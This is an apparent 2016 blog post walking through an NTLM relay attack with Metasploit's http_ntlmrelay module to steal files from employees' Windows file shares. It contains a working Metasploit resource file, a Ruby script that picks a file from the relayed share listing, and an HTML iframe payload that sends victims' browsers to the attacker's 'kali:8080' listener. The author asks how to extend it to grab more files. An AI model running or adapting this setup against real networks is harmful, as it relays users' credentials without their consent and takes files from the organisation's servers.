Sunday, July 24, 2016

Trying to automate the downloading of all files in a share using metasploit's http_ntlmrelay module with little recon.

Sorry for the long title. I have been trying to automate the downloading of all files on a share using metasploit's http_ntlmrelay module. Here is the scenario: you are on a network with file servers that host employees' Windows Documents folders and authenticate using NTLM. Active Directory allows anonymous read access, which you can use to find the address of the file server and the share path the user has access to. Assuming you have only one shot to get the loot, I first use RTYPE SMB_LS, then use a sync file to parse the listing and download the first file found using SMB_GET. I used a resource file to tie it all together; here is the code I used below.

resource.rb
use auxiliary/server/http_ntlmrelay
unset all
# clear any notes left over from a previous run so syncfile.rb only sees fresh data
notes -d
set RHOST
set RPORT 445
# first listener: relay the victim's NTLM auth and list the share
set RTYPE SMB_LS
set RURIPATH
set URIPATH test1
run
# second listener: relay again and fetch the file chosen by syncfile.rb
set RTYPE SMB_GET
set SYNCFILE syncfile.rb
set URIPATH test2
run

syncfile.rb
print_status("looking for data...")
framework.db.notes.each do |note|
  # only the notes written by http_ntlmrelay are of interest
  next unless note.ntype == 'ntlm_relay'
  # the SMB_LS response maps each entry name to its attributes;
  # the attribute hash stringifies as {"type"=>"F", ...} for a regular file
  note.data[:Response].each do |name, attrs|
    p1 = attrs.to_s.split(",")
    if p1[0] == '{"type"=>"F"'
      # point the SMB_GET run at this file (the last regular file seen wins)
      datastore['RURIPATH'] = note.data[:RURI] + name
    end
  end
  print_status(datastore['RURIPATH'])
end

payload.html
<iframe src="http://kali:8080/test1"></iframe>
<iframe src="http://kali:8080/test2"></iframe>

The issues I'm having are that this method can only download one file at the moment, and that if the share's path goes deeper than one directory (i.e. path\to\share\) test1 does not authenticate properly and the attack fails. I have just started digging into the source code of the module but have not gotten anywhere yet. I will keep you posted if I figure anything out; if you have a solution, please let me know! Thank you and enjoy.